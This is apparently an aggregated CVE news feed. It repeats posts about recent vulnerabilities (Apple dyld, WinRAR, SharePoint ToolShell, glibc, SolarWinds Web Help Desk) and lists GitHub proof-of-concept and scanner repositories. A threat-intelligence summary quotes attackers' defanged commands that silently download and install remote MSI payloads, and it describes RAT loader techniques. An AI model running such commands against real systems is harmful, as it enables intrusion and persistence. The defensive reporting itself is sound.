Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.
🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3
📣 EMERGENCY UPDATES 📣
Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.
🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3
updated 2025-12-15T15:30:31
2 posts
6 repos
https://github.com/typeconfused/CVE-2025-14174-analysis
https://github.com/George0Papasotiriou/CVE-2025-14174-Chrome-Zero-Day
https://github.com/sakyu7/sakyu7.github.io
https://github.com/Satirush/CVE-2025-14174-Poc
📣 EMERGENCY UPDATES 📣
Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.
🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3
📣 EMERGENCY UPDATES 📣
Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.
🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3
updated 2025-10-30T15:50:59.680000
2 posts
28 repos
https://github.com/knight0x07/WinRAR-CVE-2025-8088-PoC-RAR
https://github.com/pentestfunctions/best-CVE-2025-8088
https://github.com/Ismael-20223/CVE-2025-8088
https://github.com/ilhamrzr/RAR-Anomaly-Inspector
https://github.com/pescada-dev/-CVE-2025-8088
https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder
https://github.com/nhattanhh/CVE-2025-8088
https://github.com/xi0onamdev/WinRAR-CVE-2025-8088-Exploitation-Toolkit
https://github.com/jordan922/CVE-2025-8088
https://github.com/onlytoxi/CVE-2025-8088-Winrar-Tool
https://github.com/walidpyh/CVE-2025-8088
https://github.com/travisbgreen/cve-2025-8088
https://github.com/hbesljx/CVE-2025-8088-EXP
https://github.com/nuky-alt/CVE-2025-8088
https://github.com/DeepBlue-dot/CVE-2025-8088-WinRAR-Startup-PoC
https://github.com/0xAbolfazl/CVE-2025-8088-WinRAR-PathTraversal-PoC
https://github.com/Markusino488/cve-2025-8088
https://github.com/AdityaBhatt3010/CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal
https://github.com/ghostn4444/CVE-2025-8088
https://github.com/lucyna77/winrar-exploit
https://github.com/pentestfunctions/CVE-2025-8088-Multi-Document
https://github.com/pexlexity/WinRAR-CVE-2025-8088-Path-Traversal-PoC
https://github.com/techcorp/CVE-2025-8088-Exploit
https://github.com/hexsecteam/CVE-2025-8088-Winrar-Tool
https://github.com/sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-
https://github.com/Shinkirou789/Cve-2025-8088-WinRar-vulnerability
https://github.com/Syrins/CVE-2025-8088-Winrar-Tool-Gui
https://github.com/kitsuneshade/WinRAR-Exploit-Tool---Rust-Edition
#CheckPoint Research observed #Amaranth-Dragon, a Chinese-aligned group linked to #APT41, conducting espionage against government and law enforcement across Southeast Asia. The threat actor weaponized #WinRAR flaw CVE-2025-8088 within 10 days after its disclosure, geo-fenced servers to targets, and introduced #TGAmaranth, a Telegram-based remote access tool.
###CheckPoint Research observed #Amaranth-Dragon, a Chinese-aligned group linked to #APT41, conducting espionage against government and law enforcement across Southeast Asia. The threat actor weaponized #WinRAR flaw CVE-2025-8088 within 10 days after its disclosure, geo-fenced servers to targets, and introduced #TGAmaranth, a Telegram-based remote access tool.
##updated 2025-10-28T14:14:01.610000
2 posts
7 repos
https://github.com/zldww2011/CVE-2018-0802_POC
https://github.com/Abdibimantara/Maldoc-Analysis
https://github.com/likekabin/CVE-2018-0802_CVE-2017-11882
https://github.com/rxwx/CVE-2018-0802
https://github.com/Palvinder-Singh/PS_CVE2018-0802
Observed campaign summary:
Initial Access:
• Phishing emails with Excel (.XLAM) attachments
Execution:
• CVE-2018-0802 (EQNEDT32.EXE)
• HTA → mshta.exe
• PowerShell in-memory decoding
Deployment:
• Fileless .NET loader disguised as Microsoft.Win32.TaskScheduler
• Process hollowing into Msbuild.exe
• AES-encrypted C2 packets
• delimited command protocol
• Plugin-based architecture (50+ modules)
Capabilities include credential theft, ransomware, DDoS, system control, registry persistence, and remote command execution.
This campaign demonstrates mature modular RAT engineering combined with social engineering entry points.
Blue teamers - which telemetry source provides the strongest signal here?
Follow @technadu for ongoing malware analysis and threat intelligence coverage.
#Infosec #MalwareResearch #ThreatIntel #XWorm #RAT #ProcessInjection #EDR #DFIR #CyberDefense #BlueTeam #TechNadu
##Observed campaign summary:
Initial Access:
• Phishing emails with Excel (.XLAM) attachments
Execution:
• CVE-2018-0802 (EQNEDT32.EXE)
• HTA → mshta.exe
• PowerShell in-memory decoding
Deployment:
• Fileless .NET loader disguised as Microsoft.Win32.TaskScheduler
• Process hollowing into Msbuild.exe
• AES-encrypted C2 packets
• delimited command protocol
• Plugin-based architecture (50+ modules)
Capabilities include credential theft, ransomware, DDoS, system control, registry persistence, and remote command execution.
This campaign demonstrates mature modular RAT engineering combined with social engineering entry points.
Blue teamers - which telemetry source provides the strongest signal here?
Follow @technadu for ongoing malware analysis and threat intelligence coverage.
#Infosec #MalwareResearch #ThreatIntel #XWorm #RAT #ProcessInjection #EDR #DFIR #CyberDefense #BlueTeam #TechNadu
##updated 2025-10-27T17:12:40.607000
2 posts
47 repos
https://github.com/ghostn4444/CVE-2025-53770
https://github.com/kaizensecurity/CVE-2025-53770
https://github.com/behnamvanda/CVE-2025-53770-Checker
https://github.com/harryhaxor/CVE-2025-53770-SharePoint-Deserialization-RCE-PoC
https://github.com/Udyz/CVE-2025-53770-Exploit
https://github.com/paolokappa/SharePointSecurityMonitor
https://github.com/rbctee/CVE-2025-53770
https://github.com/nisargsuthar/suricata-rule-CVE-2025-53770
https://github.com/go-bi/sharepoint-CVE-2025-53770
https://github.com/bitsalv/ToolShell-Honeypot
https://github.com/yosasasutsut/Blackash-CVE-2025-53770
https://github.com/siag-itsec/CVE-2025-53770-Hunting
https://github.com/Michaael01/LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell
https://github.com/chrisalee27-dotcom/SOC-Incident-Response-Portfolio
https://github.com/hazcod/CVE-2025-53770
https://github.com/exfil0/CVE-2025-53770
https://github.com/r3xbugbounty/CVE-2025-53770
https://github.com/Immersive-Labs-Sec/SharePoint-CVE-2025-53770-POC
https://github.com/saladin0x1/CVE-2025-53770
https://github.com/Agampreet-Singh/CVE-2025-53770
https://github.com/Bluefire-Redteam-Cybersecurity/bluefire-sharepoint-cve-2025-53770
https://github.com/peiqiF4ck/WebFrameworkTools-5.5-enhance
https://github.com/imbas007/CVE-2025-53770-Vulnerable-Scanner
https://github.com/soltanali0/CVE-2025-53770-Exploit
https://github.com/Rabbitbong/OurSharePoint-CVE-2025-53770
https://github.com/GreenForceNetworks/Toolshell_CVE-2025-53770
https://github.com/tripoloski1337/CVE-2025-53770-scanner
https://github.com/bharath-cyber-root/sharepoint-toolshell-cve-2025-53770
https://github.com/grupooruss/CVE-2025-53770-Checker
https://github.com/bossnick98/-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE
https://github.com/anwakub/CVE-2025-53770
https://github.com/n1chr0x/ZeroPoint
https://github.com/unk9vvn/sharepoint-toolpane
https://github.com/0xray5c68616e37/cve-2025-53770
https://github.com/Sec-Dan/CVE-2025-53770-Scanner
https://github.com/zach115th/ToolShellFinder
https://github.com/ZephrFish/CVE-2025-53770-Scanner
https://github.com/daryllundy/CVE-2025-53770
https://github.com/MuhammadWaseem29/CVE-2025-53770
https://github.com/3a7/CVE-2025-53770
https://github.com/Cameloo1/sharepoint-toolshell-micro-postmortem
https://github.com/RukshanaAlikhan/CVE-2025-53770
https://github.com/0x-crypt/CVE-2025-53770-Scanner
https://github.com/CyprianAtsyor/ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend
https://github.com/BirdsAreFlyingCameras/CVE-2025-53770_Raw-HTTP-Request-Generator
https://github.com/AdityaBhatt3010/CVE-2025-53770-SharePoint-Zero-Day-Variant-Exploited-for-Full-RCE
What Defined Defense in 2025
Read the full blog WHAT CVE-2025-53770 TEACHES US ABOUT ZERO-DAY REALITY AND RANSOMWARE ROUTINE This blog reframes zero-day exploitation as an...
🔗️ [Binarydefense] https://link.is.it/3GT18k
##What CVE-2025-53770 Teaches Us About Zero-Day Reality and Ransomware…
CVE-2025-53770 is a critical SharePoint RCE flaw. The goals certainly don’t. The Exploit Chain: Familiar Steps, Different Stage At its core,…
🔗️ [Binarydefense] https://link.is.it/EtPFu3
##updated 2025-10-22T00:32:52
1 posts
17 repos
https://github.com/hadrian3689/looney-tunables-CVE-2023-4911
https://github.com/NishanthAnand21/CVE-2023-4911-PoC
https://github.com/KillReal01/CVE-2023-4911
https://github.com/guffre/CVE-2023-4911
https://github.com/silent6trinity/looney-tuneables
https://github.com/Billar42/CVE-2023-4911
https://github.com/chaudharyarjun/LooneyPwner
https://github.com/puckiestyle/CVE-2023-4911
https://github.com/Diego-AltF4/CVE-2023-4911
https://github.com/leesh3288/CVE-2023-4911
https://github.com/ruycr4ft/CVE-2023-4911
https://github.com/Green-Avocado/CVE-2023-4911
https://github.com/xiaoQ1z/CVE-2023-4911
https://github.com/teraGL/looneyCVE
https://github.com/RickdeJager/CVE-2023-4911
🚨 New Exploit: glibc 2.38 - Buffer Overflow
📋 CVE: CVE-2023-4911
👤 Author: Beatriz Fresno Naumova
🔗 https://www.exploit-db.com/exploits/52479
#ExploitDB #InfoSec #CyberSecurity #CVE-2023-4911
##updated 2025-10-10T16:22:30.703000
1 posts
1 repos
🚨 New Exploit: motionEye 0.43.1b4 - RCE
📋 CVE: CVE-2025-60787
👤 Author: prabhat
🔗 https://www.exploit-db.com/exploits/52481
#ExploitDB #InfoSec #CyberSecurity #CVE-2025-60787
##updated 2025-09-23T06:30:33
2 posts
1 repos
----------------
🎯 Threat Intelligence
===================
Executive summary: Huntress observed active exploitation of SolarWinds Web Help Desk (WHD) tied to recent untrusted-deserialization vulnerabilities, notably CVE-2025-26399 and CVE-2025-40551. Attackers achieved remote code execution and quickly deployed legitimate remote-management and DFIR tooling to maintain access.
Technical details:
• Initial process chain reported: wrapper.exe (WHD service wrapper) spawned java.exe (Tomcat-based WHD) which launched cmd.exe to silently install MSI payloads.
• Observed staged installers and deployment vectors:
• msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi (Zoho/ManageEngine RMM agent)
• msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi (Velociraptor MSI)
• Remote access persistence included unattended Zoho Assist/ManageEngine registration tied to Proton Mail account esmahyft@proton[.]me.
• Post-exploitation activity included Active Directory discovery using net group "domain computers" /do, executed from the RMM agent process TOOLSIQ.EXE.
Attack chain analysis:
• Initial Access: Exploitation of WHD deserialization vulnerabilities (CVE-2025-26399, CVE-2025-40551).
• Download: MSI payloads hosted on third-party services (Catbox, Supabase).
• Execution: Silent MSI installation via spawned command process from WHD service chain.
• Persistence & Lateral Movement: Legitimate RMM agent configured for unattended access; AD enumeration to enumerate domain targets.
• C2/Tooling: Velociraptor deployed and configured pointing at attacker-controlled storage/infrastructure.
Detection considerations:
• Monitor for anomalous child processes of wrapper.exe/java.exe and unexpected use of msiexec pulling from unusual domains.
• Look for registrations or sessions associated with Zoho/ManageEngine agents and unusual agent process names like TOOLSIQ.EXE.
• Review AD enumeration activity (net group queries) originating from endpoints hosting WHD or RMM agents.
Limitations & notes:
• Huntress observed exploitation across three customers and reports protection coverage across 84 endpoints in 78 organizations using WHD.
• Public advisories include Microsoft notes and CISA listing for CVE-2025-40551; versions prior to 12.8.7 HF1 are reported as vulnerable.
🔹 solarwinds #CVE-2025-26399 #CVE-2025-40551 #velociraptor #zoho
🔗 Source: https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##Huntress researchers Anna Pham, John Hammond & Jamie Levy observed threat actors exploiting a SolarWinds Web Help Desk vulnerability and warn organizations to apply the update from SolarWinds’ website as soon as possible. https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##updated 2025-09-17T15:31:32
1 posts
updated 2025-04-15T18:39:27.967000
2 posts
Should be a lot more! They don't organise frontend and npm vuln that way. This doesn't even mention JavaScript:
https://www.cve.org/CVERecord?id=CVE-2025-3573
The search relies on descriptions for which standard terms are "an ongoing area of research" 🧐
https://www.cve.org/ResourcesSupport/FAQs#pc_cve_list_basicssearch_cve
##Should be a lot more! They don't organise frontend and npm vuln that way. This doesn't even mention JavaScript:
https://www.cve.org/CVERecord?id=CVE-2025-3573
The search relies on descriptions for which standard terms are "an ongoing area of research" 🧐
https://www.cve.org/ResourcesSupport/FAQs#pc_cve_list_basicssearch_cve
##📣 EMERGENCY UPDATES 📣
Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.
🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3
📣 EMERGENCY UPDATES 📣
Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.
🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3
🚨 karutoil catalyst (<11980aaf3f46315b02777f325ba02c56b110165d) faces CRITICAL OS command injection (CVE-2026-26009, CVSS 10.0). Users with template perms can execute root shell commands cluster-wide. Patch immediately! https://radar.offseq.com/threat/cve-2026-26009-cwe-78-improper-neutralization-of-s-ff7845bb #OffSeq #vuln #infosec #CVE202626009
##🔴 CVE-2026-26009 - Critical (9.9)
Catalyst is a platform built for enterprise game server hosts, game communities, and billing panel integrations. Install scripts defined in server templates execute directly on the host operating system as root via bash -c, with no sandboxing or c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26009/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-26009 - Critical (9.9)
Catalyst is a platform built for enterprise game server hosts, game communities, and billing panel integrations. Install scripts defined in server templates execute directly on the host operating system as root via bash -c, with no sandboxing or c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26009/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21523 - High (8)
Time-of-check time-of-use (toctou) race condition in GitHub Copilot and Visual Studio allows an authorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21523/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21523 - High (8)
Time-of-check time-of-use (toctou) race condition in GitHub Copilot and Visual Studio allows an authorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21523/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25506 - High (7.7)
MUNGE is an authentication service for creating and validating user credentials. From 0.5 to 0.5.17, local attacker can exploit a buffer overflow vulnerability in munged (the MUNGE authentication daemon) to leak cryptographic key material from pro...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25506/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25506 - High (7.7)
MUNGE is an authentication service for creating and validating user credentials. From 0.5 to 0.5.17, local attacker can exploit a buffer overflow vulnerability in munged (the MUNGE authentication daemon) to leak cryptographic key material from pro...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25506/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24682 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, audin_server_recv_formats frees an incorrect number of audio formats on parse failure (i + i), leading to out-of-bounds access in audio_formats_free. This vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24682/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24682 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, audin_server_recv_formats frees an incorrect number of audio formats on parse failure (i + i), leading to out-of-bounds access in audio_formats_free. This vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24682/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25931 - High (7.8)
vscode-spell-checker is a basic spell checker that works well with code and documents. Prior to v4.5.4, DocumentSettings._determineIsTrusted treats the configuration value cSpell.trustedWorkspace as the authoritative trust flag. The value defaults...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25931/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##